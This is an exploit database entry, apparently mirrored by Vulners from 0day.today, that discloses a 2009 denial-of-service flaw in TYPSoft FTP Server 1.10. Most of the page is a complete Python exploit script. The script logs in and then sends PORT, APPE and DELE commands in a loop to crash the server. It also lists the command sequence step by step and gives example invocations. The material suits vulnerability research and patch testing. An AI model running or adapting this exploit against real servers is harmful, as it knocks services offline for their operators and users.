Lucene search

K

TYPSoft 1.10 APPE DELE DOS

🗓️ 24 Nov 2009 00:00:00Reported by leinakesiType 
zdt
 zdt
🔗 0day.today👁 13 Views

TYPSoft 1.10 FTP Server Denial of Servic

Show more
Code
==========================
TYPSoft 1.10 APPE DELE DOS
==========================


# Title: TYPSoft 1.10 APPE DELE DOS
# CVE-ID: ()
# OSVDB-ID: ()
# Author: leinakesi
# Published: 2009-11-24
# Verified: yes

view source
print?
Bugtraq: http://seclists.org/bugtraq/2009/Nov/163
 
Date of Discovery: 24-Nov-2009
 
Vendor: TYPSoft
 
Affected:
TYPSoft FTP Server Version 1.10
Earlier versions may also be affected
 
Overview:
TYPSoft FTP Server is an easy use FTP server Application. Denial of Service vulnerability exists in TYPSoft FTP Server
when
 
"APPE" and "DELE" commands are used in the same socket connection.
 
Details:
If you could log on the server successfully, take the following steps and the ftp server will crash which would lead to
 
Denial of Service attack:
 
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("PORT 127,0,0,1,122,107\r\n")
5.sock.send("APPE "+ test_string +"\r\n")
6.sock.send("DELE "+ test_string +"\r\n")
7.sock.close()
 
 
Severity:
High
 
Exploit example:
 
#!/usr/bin/python
import socket
import sys
import time
 
def Usage():
    print ("Usage:  ./expl.py   <local_ip>  <serv_ip>      <Username> <password>\n")
    print ("Example:./expl.py 127.0.0.1 127.0.0.1 anonymous anonymous\n")
    print ("Example:./expl.py 192.168.48.183 192.168.48.111 anonymous anonymous\n")
if len(sys.argv) <> 5:
        Usage()
        sys.exit(1)
else:
    local=sys.argv[1]
    hostname=sys.argv[2]
    username=sys.argv[3]
    passwd=sys.argv[4]
    test_string="a"*30
    ip_every=local.split('.')
    for i in range(1,10000):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((hostname, 21))
        except:
            print ("Connection error!")
            sys.exit(1)
        r=sock.recv(1024)
        print "[+] "+ r
        sock.send("user %s\r\n" %username)
        print "[-] "+ ("user %s\r\n" %username)
        r=sock.recv(1024)
        print "[+] "+ r
        sock.send("pass %s\r\n" %passwd)
        print "[-] "+ ("pass %s\r\n" %passwd)
        r=sock.recv(1024)
        print "[+] "+ r
     
        sock_data.bind((local,31339))
        sock_data.listen(1)
         
        sock.send("PORT " + ip_every[0] +","+ ip_every[1] +","+ ip_every[2] +"," + ip_every[3] + ",122,107\r\n")
        print "[-] "+ ("PORT " + local + "122,107\r\n")
        r=sock.recv(1024)
        print "[+] "+ r
             
        sock.send("APPE "+ test_string +"\r\n")
        print "[-] "+ ("APPE "+ test_string +"\r\n")
        r=sock.recv(1024)
        print "[+] "+ r
         
        sock.send("DELE "+ test_string +"\r\n")
        print "[-] "+ ("DELE "+ test_string +"\r\n")
        r=sock.recv(1024)
        print "[+] "+ r   
          
        sock.close()
        sock_data.close()
        time.sleep(2)
                 
 
  
 
     
    sys.exit(0);



#  0day.today [2018-04-04]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
24 Nov 2009 00:00Current
7High risk
Vulners AI Score7
13
.json
Report